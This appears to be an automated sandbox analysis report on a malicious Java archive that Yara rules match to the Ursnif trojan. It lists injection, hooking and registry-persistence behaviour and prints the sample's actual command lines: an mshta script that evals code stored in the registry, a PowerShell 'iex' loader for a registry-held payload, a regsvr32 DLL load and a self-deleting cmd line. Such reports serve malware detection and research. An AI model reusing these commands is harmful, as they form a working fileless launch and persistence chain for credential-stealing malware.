Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 6_2_04804CEA CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,CryptDecrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError, 6_2_04804CEA

System Summary:

Writes or reads registry keys via WMI
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::CreateKey
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Writes registry values via WMI
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Contains functionality to call native functions
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 6_2_04801ADF GetProcAddress,NtCreateSection,memset, 6_2_04801ADF
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 6_2_048025E5 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose, 6_2_048025E5
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 6_2_04804F6E NtMapViewOfSection, 6_2_04804F6E
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 6_2_04808055 NtQueryVirtualMemory, 6_2_04808055
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 6_2_059F25B9 memcpy,memcpy,memcpy,NtUnmapViewOfSection,memset, 6_2_059F25B9
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 6_2_059E51A4 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose, 6_2_059E51A4
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 6_2_059E4D10 RtlInitializeCriticalSection,RtlInitializeCriticalSection,memset,RtlInitializeCriticalSection,CreateMutexA,GetLastError,GetLastError,CloseHandle,GetUserNameA,GetUserNameA,RtlAllocateHeap,GetUserNameA,NtQueryInformationProcess,OpenProcess,GetLastError,CloseHandle,GetShellWindow,GetWindowThreadProcessId,memcpy,CreateEventA,CreateEventA,RtlAllocateHeap,OpenEventA,CreateEventA,GetLastError,GetLastError,LoadLibraryA,SetEvent,RtlAllocateHeap,wsprintfA, 6_2_059E4D10
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 6_2_059E790F NtAllocateVirtualMemory,NtAllocateVirtualMemory,RtlNtStatusToDosError,SetLastError, 6_2_059E790F
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 6_2_059D68EE NtWow64ReadVirtualMemory64,GetProcAddress,NtWow64ReadVirtualMemory64, 6_2_059D68EE
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 6_2_059D3C5B NtCreateSection,memset, 6_2_059D3C5B
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 6_2_059F33A6 memset,NtWow64QueryInformationProcess64,GetProcAddress,NtWow64QueryInformationProcess64, 6_2_059F33A6
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 6_2_059DCBA7 NtWriteVirtualMemory,NtWriteVirtualMemory,RtlNtStatusToDosError,SetLastError, 6_2_059DCBA7
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 6_2_059D4F72 GetProcAddress,NtWow64QueryInformationProcess64,StrRChrA, 6_2_059D4F72
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 6_2_059EA680 NtMapViewOfSection, 6_2_059EA680
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 6_2_059F0A00 GetSystemTimeAsFileTime,HeapCreate,NtQueryInformationThread,GetModuleHandleA,RtlImageNtHeader,RtlExitUserThread, 6_2_059F0A00
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 6_2_059E6A33 NtQueryInformationProcess, 6_2_059E6A33
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 6_2_059EAD9A NtReadVirtualMemory,RtlNtStatusToDosError,SetLastError, 6_2_059EAD9A
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 6_2_059E09C7 OpenProcess,GetLastError,GetProcAddress,NtSetInformationProcess,RtlNtStatusToDosError,GetProcAddress,GetProcAddress,TerminateThread,ResumeThread,CloseHandle,GetLastError,CloseHandle, 6_2_059E09C7
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 6_2_059D8936 memset,NtQueryInformationProcess, 6_2_059D8936
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 6_2_059EE543 NtGetContextThread,RtlNtStatusToDosError, 6_2_059EE543
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 6_2_059D349A memset,memcpy,NtSetContextThread,RtlNtStatusToDosError,GetLastError, 6_2_059D349A
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 6_2_059F03BD NtQuerySystemInformation,RtlNtStatusToDosError, 6_2_059F03BD
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 6_2_059F133A NtQueryInformationThread,GetLastError,RtlNtStatusToDosError, 6_2_059F133A
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 6_2_059DC240 NtQueryKey,NtQueryKey,lstrlenW,NtQueryKey,lstrcpyW, 6_2_059DC240
Source: C:\Windows\System32\control.exe Code function: 23_2_00A275AC NtReadVirtualMemory, 23_2_00A275AC
Source: C:\Windows\System32\control.exe Code function: 23_2_00A379DC NtQueryInformationToken,NtQueryInformationToken,NtClose, 23_2_00A379DC
Source: C:\Windows\System32\control.exe Code function: 23_2_00A3991C NtWriteVirtualMemory, 23_2_00A3991C
Source: C:\Windows\System32\control.exe Code function: 23_2_00A1C29C NtQueryInformationProcess, 23_2_00A1C29C
Source: C:\Windows\System32\control.exe Code function: 23_2_00A266D4 NtSetInformationProcess,CreateRemoteThread, 23_2_00A266D4
Source: C:\Windows\System32\control.exe Code function: 23_2_00A4F002 NtProtectVirtualMemory,NtProtectVirtualMemory, 23_2_00A4F002
Contains functionality to launch a process as a different user
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 6_2_059D5195 CreateProcessAsUserW, 6_2_059D5195
Detected potential crypto function
Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe Code function: 2_3_1535CC3A 2_3_1535CC3A
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 6_2_04806680 6_2_04806680
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 6_2_04807E30 6_2_04807E30
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 6_2_0480175B 6_2_0480175B
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 6_2_059EED58 6_2_059EED58
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 6_2_059D98A0 6_2_059D98A0
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 6_2_059DD8E5 6_2_059DD8E5
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 6_2_059D2F9C 6_2_059D2F9C
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 6_2_059E0F82 6_2_059E0F82
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 6_2_059EDE9A 6_2_059EDE9A
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 6_2_059DB2A4 6_2_059DB2A4
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 6_2_059DEAFA 6_2_059DEAFA
Source: C:\Windows\System32\control.exe Code function: 23_2_00A3832C 23_2_00A3832C
Source: C:\Windows\System32\control.exe Code function: 23_2_00A15080 23_2_00A15080
Source: C:\Windows\System32\control.exe Code function: 23_2_00A130FC 23_2_00A130FC
Source: C:\Windows\System32\control.exe Code function: 23_2_00A190FC 23_2_00A190FC
Source: C:\Windows\System32\control.exe Code function: 23_2_00A1A8C4 23_2_00A1A8C4
Source: C:\Windows\System32\control.exe Code function: 23_2_00A19CD0 23_2_00A19CD0
Source: C:\Windows\System32\control.exe Code function: 23_2_00A258DC 23_2_00A258DC
Source: C:\Windows\System32\control.exe Code function: 23_2_00A25C24 23_2_00A25C24
Source: C:\Windows\System32\control.exe Code function: 23_2_00A15814 23_2_00A15814
Source: C:\Windows\System32\control.exe Code function: 23_2_00A11C78 23_2_00A11C78
Source: C:\Windows\System32\control.exe Code function: 23_2_00A2F598 23_2_00A2F598
Source: C:\Windows\System32\control.exe Code function: 23_2_00A125E8 23_2_00A125E8
Source: C:\Windows\System32\control.exe Code function: 23_2_00A275F8 23_2_00A275F8
Source: C:\Windows\System32\control.exe Code function: 23_2_00A35110 23_2_00A35110
Source: C:\Windows\System32\control.exe Code function: 23_2_00A1ED6C 23_2_00A1ED6C
Source: C:\Windows\System32\control.exe Code function: 23_2_00A2CD6C 23_2_00A2CD6C
Source: C:\Windows\System32\control.exe Code function: 23_2_00A30D44 23_2_00A30D44
Source: C:\Windows\System32\control.exe Code function: 23_2_00A17D48 23_2_00A17D48
Source: C:\Windows\System32\control.exe Code function: 23_2_00A3A280 23_2_00A3A280
Source: C:\Windows\System32\control.exe Code function: 23_2_00A1FEE4 23_2_00A1FEE4
Source: C:\Windows\System32\control.exe Code function: 23_2_00A20EF4 23_2_00A20EF4
Source: C:\Windows\System32\control.exe Code function: 23_2_00A3CAF4 23_2_00A3CAF4
Source: C:\Windows\System32\control.exe Code function: 23_2_00A146C0 23_2_00A146C0
Source: C:\Windows\System32\control.exe Code function: 23_2_00A36E34 23_2_00A36E34
Source: C:\Windows\System32\control.exe Code function: 23_2_00A35E3C 23_2_00A35E3C
Source: C:\Windows\System32\control.exe Code function: 23_2_00A25210 23_2_00A25210
Source: C:\Windows\System32\control.exe Code function: 23_2_00A36268 23_2_00A36268
Source: C:\Windows\System32\control.exe Code function: 23_2_00A1624C 23_2_00A1624C
Source: C:\Windows\System32\control.exe Code function: 23_2_00A18254 23_2_00A18254
Source: C:\Windows\System32\control.exe Code function: 23_2_00A2625C 23_2_00A2625C
Source: C:\Windows\System32\control.exe Code function: 23_2_00A1C3B4 23_2_00A1C3B4
Source: C:\Windows\System32\control.exe Code function: 23_2_00A1BB94 23_2_00A1BB94
Source: C:\Windows\System32\control.exe Code function: 23_2_00A23BE0 23_2_00A23BE0
Source: C:\Windows\System32\control.exe Code function: 23_2_00A13B24 23_2_00A13B24
Source: C:\Windows\System32\control.exe Code function: 23_2_00A2AF34 23_2_00A2AF34
Source: C:\Windows\System32\control.exe Code function: 23_2_00A27F68 23_2_00A27F68
Source: C:\Windows\System32\control.exe Code function: 23_2_00A2EF74 23_2_00A2EF74
Source: C:\Windows\System32\control.exe Code function: 23_2_00A3BB54 23_2_00A3BB54
PE file does not import any functions
Source: wfvgme3v.dll.24.dr Static PE information: No import functions for PE file found
Source: wm2qs3oi.dll.26.dr Static PE information: No import functions for PE file found
Searches for the Microsoft Outlook file path
Source: C:\Windows\System32\mshta.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
Tries to load missing DLLs
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: sfc.dll
Source: classification engine Classification label: mal100.troj.expl.evad.winJAR@28/21@8/3
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 6_2_04806244 CreateToolhelp32Snapshot,Process32First,StrStrIA,Process32Next,CloseHandle, 6_2_04806244
Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Crypto
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6708:120:WilError_01
Source: C:\Windows\SysWOW64\regsvr32.exe Mutant created: \Sessions\1\BaseNamedObjects\{6263D934-590B-E4FC-F3B6-9D58D74A210C}
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7012:120:WilError_01
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: \Sessions\1\BaseNamedObjects\{22FA4B61-1933-A481-B376-5D18970AE1CC}
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4260:120:WilError_01
Source: C:\Windows\System32\control.exe Mutant created: \Sessions\1\BaseNamedObjects\{12AE2B8E-49F6-148B-6366-8D8847FA113C}
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3064:120:WilError_01
Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe File created: C:\Users\user\AppData\Local\Temp\hsperfdata_user
Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe Section loaded: C:\Program Files (x86)\Java\jre1.8.0_211\bin\client\jvm.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\System32\mshta.exe File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\SysWOW64\regsvr32.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: unknown Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ''C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe' -javaagent:'C:\Users\user\AppData\Local\Temp\jartracer.jar' -jar 'C:\Users\user\Desktop\wuxvGLNrxG.jar'' >> C:\cmdlinestart.log 2>&1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe 'C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe' -javaagent:'C:\Users\user\AppData\Local\Temp\jartracer.jar' -jar 'C:\Users\user\Desktop\wuxvGLNrxG.jar'
Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe Process created: C:\Windows\SysWOW64\icacls.exe C:\Windows\system32\icacls.exe C:\ProgramData\Oracle\Java\.oracle_jre_usage /grant 'everyone':(OI)(CI)M
Source: C:\Windows\SysWOW64\icacls.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /s C:\Users\user\winapp.dll
Source: unknown Process created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Uxax='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Uxax).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\DeviceFile'));if(!window.flag)close()</script>'
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool))
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\regsvr32.exe Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\wfvgme3v\wfvgme3v.cmdline'
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES3CF2.tmp' 'c:\Users\user\AppData\Local\Temp\wfvgme3v\CSCBEAB7CEF44BD41E5AC32CBB29DE9912D.TMP'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\wm2qs3oi\wm2qs3oi.cmdline'
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES50C8.tmp' 'c:\Users\user\AppData\Local\Temp\wm2qs3oi\CSC4DF65D5B5CD44487ACE6B52D8E184D85.TMP'
Source: C:\Windows\explorer.exe Process created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /C ping localhost -n 5 && del 'C:\Users\user\winapp.dll'
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\PING.EXE ping localhost -n 5
Source: C:\Windows\SysWOW64\regsvr32.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32
Source: C:\Windows\System32\mshta.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe File opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dll
Source: Binary string: ntdll.pdb source: regsvr32.exe, 00000006.00000003.847587906.0000000005EB0000.00000004.00000001.sdmp
Source: Binary string: ntdll.pdbUGP source: regsvr32.exe, 00000006.00000003.847587906.0000000005EB0000.00000004.00000001.sdmp

Data Obfuscation:

Suspicious powershell command line found
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool))
Compiles C# or VB.Net code
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\wfvgme3v\wfvgme3v.cmdline'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\wm2qs3oi\wm2qs3oi.cmdline'
Contains functionality to dynamically determine API calls
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 6_2_059D89F5 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 6_2_059D89F5
Registers a DLL
Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /s C:\Users\user\winapp.dll
Uses code obfuscation techniques (call, push, ret)
Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe Code function: 2_3_1531C064 push ss; retf 2_3_1531C089
Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe Code function: 2_3_1535CBEF push esp; retf 2_3_1535CBF1
Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe Code function: 2_3_15357A5F push FFFFFFCFh; iretd 2_3_15357A3E
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 6_2_04807AB0 push ecx; ret 6_2_04807AB9
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 6_2_04807E1F push ecx; ret 6_2_04807E2F
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 6_2_0480B1DE push esp; iretd 6_2_0480B26C
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 6_2_059F528F push ecx; ret 6_2_059F529F

Persistence and Installation Behavior:

Exploit detected, runtime environment dropped PE file
Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe File created: winapp.dll.2.dr
Drops PE files
Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe File created: C:\Users\user\winapp.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe File created: C:\Users\user\AppData\Local\Temp\wm2qs3oi\wm2qs3oi.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe File created: C:\Users\user\AppData\Local\Temp\wfvgme3v\wfvgme3v.dll
Drops PE files to the user directory
Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe File created: C:\Users\user\winapp.dll

Boot Survival:

Drops PE files to the user root directory
Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe File created: C:\Users\user\winapp.dll

Hooking and other Techniques for Hiding and Protection:

Yara detected Ursnif
Source: Yara match File source: 00000017.00000003.855478624.0000026AD9ADC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.761679763.0000000005528000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.761625791.0000000005528000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.761646149.0000000005528000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000003.855416865.0000026AD9ADC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000003.855505099.0000026AD9ADC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.761549935.0000000005528000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.772494186.000000000532C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.761577357.0000000005528000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.839202588.0000000005E98000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.761663070.0000000005528000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.761602065.0000000005528000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000003.855350034.0000026AD9ADC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.765792432.0000000005528000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000002.936194486.0000026AD9ADC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.761692784.0000000005528000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: regsvr32.exe PID: 5964, type: MEMORYSTR
Hooks registry keys query functions (used to hide registry keys)
Source: explorer.exe IAT, EAT, inline or SSDT hook detected: function: api-ms-win-core-registry-l1-1-0.dll:RegGetValueW
Modifies the export address table of user mode modules (user mode EAT hooks)
Source: explorer.exe IAT of a user mode module has changed: module: KERNEL32.DLL function: CreateProcessAsUserW address: 7FFABB03521C
Modifies the import address table of user mode modules (user mode IAT hooks)
Source: explorer.exe EAT of a user mode module has changed: module: user32.dll function: api-ms-win-core-processthreads-l1-1-0.dll:CreateProcessW address: 7FFABB035200
Modifies the prolog of user mode functions (user mode inline hooks)
Source: explorer.exe User mode code has changed: module: KERNEL32.DLL function: CreateProcessAsUserW new code: 0xFF 0xF2 0x25 0x50 0x00 0x00
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Source: C:\Windows\SysWOW64\regsvr32.exe Registry key monitored for changes: HKEY_CURRENT_USER_Classes
Uses cacls to modify the permissions of files
Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe Process created: C:\Windows\SysWOW64\icacls.exe C:\Windows\system32\icacls.exe C:\ProgramData\Oracle\Java\.oracle_jre_usage /grant 'everyone':(OI)(CI)M
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\regsvr32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
